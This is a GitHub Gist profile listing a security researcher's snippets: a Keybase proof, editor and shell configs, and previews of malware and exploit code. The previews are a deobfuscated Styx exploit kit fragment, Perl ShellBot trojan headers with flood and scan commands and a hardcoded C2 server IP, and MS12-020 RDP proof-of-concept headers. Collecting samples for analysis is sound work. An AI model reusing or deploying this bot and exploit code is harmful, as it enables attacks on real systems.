
James Espinosa jamesejr

@jamesejr
jamesejr / keybase.md
Created Oct 3, 2014
GitHub identity proof for Keybase.io verification
View keybase.md

Keybase proof

I hereby claim:

  • I am jamesejr on github.
  • I am jamesejr (https://keybase.io/jamesejr) on keybase.
  • I have a public key whose fingerprint is 4FD5 7133 4DE8 A421 59D3 8A32 6586 A1B1 A40C 39F4

To claim this, I am signing this object:

@jamesejr
jamesejr / styx_ek.js
Last active Aug 29, 2015
A deobfuscated portion of the JavaScript code found on the Styx exploit kit
View styx_ek.js
function NyMpwEMG() {
var FHQxrYhsp = window.PluginDetect.getVersion("Java");
if (typeof FHQxrYhsp == 'string') {
FHQxrYhsp = FHQxrYhsp.split(",");
if (FHQxrYhsp[3].length == 1) {
FHQxrYhsp = "" + FHQxrYhsp[1] + "0" + FHQxrYhsp[3];
} else {
FHQxrYhsp = "" + FHQxrYhsp[1] + FHQxrYhsp[3];
}
} else {
@jamesejr
jamesejr / shellbot_a.pl
Last active Jan 1, 2016
A snippet of the Perl/ShellBot.B Trojan variant script targeting phpMyAdmin
View shellbot_a.pl
#!/usr/bin/perl
# ShellBOT
#
# Comenzi: !all
# - @udp <ip> <port> <timp>;
# - @fullportscan <ip> <start port> <final port>;
# - !quit;
# - !join <canal> <key> e !part <canal> <reason>;
# - !op !deop !voice !devoice <canal> <nick>;
# - !msg !ctcp 1 2;
@jamesejr
jamesejr / shellbot_b.pl
Last active Jan 1, 2016
A snippet of the Perl/ShellBot.B Trojan variant script observed from ISC Diary
View shellbot_b.pl
#!/usr/bin/perl
my @mast3rs = ("pizza");
my @hostauth = ("sosick.net");
my @admchan=("#X");
my @server = ("89.248.172.144");
$servidor= $server[rand scalar @server] unless $servidor;
my $xeqt = "''";
@jamesejr
jamesejr / .bash_profile
Created Dec 7, 2013
Personal .bash_profile file used by the Ruby Version Manager (RVM)
View .bash_profile
# Source our bashrc file, hacky?
source ~/.bashrc
export PATH=/usr/local/bin:$PATH
# Load RVM into a shell session, as a function
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
@jamesejr
jamesejr / ruby-pack.txt
Created Aug 25, 2013
A list of Ruby directives for 'pack' e.g. [1,2,3].pack("CCn") => "\x01\x02\x00\x03"
View ruby-pack.txt
Integer | Array |
Directive | Element | Meaning
---------------------------------------------------------------------------
C | Integer | 8-bit unsigned (unsigned char)
S | Integer | 16-bit unsigned, native endian (uint16_t)
L | Integer | 32-bit unsigned, native endian (uint32_t)
Q | Integer | 64-bit unsigned, native endian (uint64_t)
| |
c | Integer | 8-bit signed (signed char)
s | Integer | 16-bit signed, native endian (int16_t)
@jamesejr
jamesejr / ms12-020.rb
Created Aug 24, 2013
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Ruby)
View ms12-020.rb
#!/usr/bin/env ruby
#
# ms12-020 PoC attempt
#
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the leaked MAPP PoC.
#
# by Joshua J. Drake (jduck)
#
@jamesejr
jamesejr / ms12-020.py
Created Aug 24, 2013
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Python)
View ms12-020.py
#
#
# ms12-020 "chinese shit" PoC v2 (wireshark version)
#
# tested on winsp3 spanish, reported to work on Win7, win 2008
#
# original source: http://115.com/file/be27pff7
#
#
@jamesejr
jamesejr / .vimrc
Last active Dec 18, 2015 — forked from todb-r7/.vimrc
Personal .vimrc file used for Metasploit Framework development
View .vimrc
" If using Janus, then this should be .vimrc.after
" Technically this is really a gvimrc but who's counting.
set nocompatible
colorscheme slate
filetype plugin indent on
set hls
" Metasploit's current default tabs
set tabstop=2 softtabstop=2 shiftwidth=2 noexpandtab shiftround smarttab
@jamesejr
jamesejr / sublime-settings
Last active May 15, 2019
Personal customized Sublime Text 3 configuration file with Inconsolata font
View sublime-settings
{
"bold_folder_labels": true,
"caret_extra_width": 1,
"caret_style": "phase",
"close_windows_when_empty": false,
"color_scheme": "Packages/Theme - Spacegray/base16-ocean.dark.tmTheme",
"draw_minimap_border": true,
"enable_tab_scrolling": false,
"font_face": "Inconsolata",
"font_options":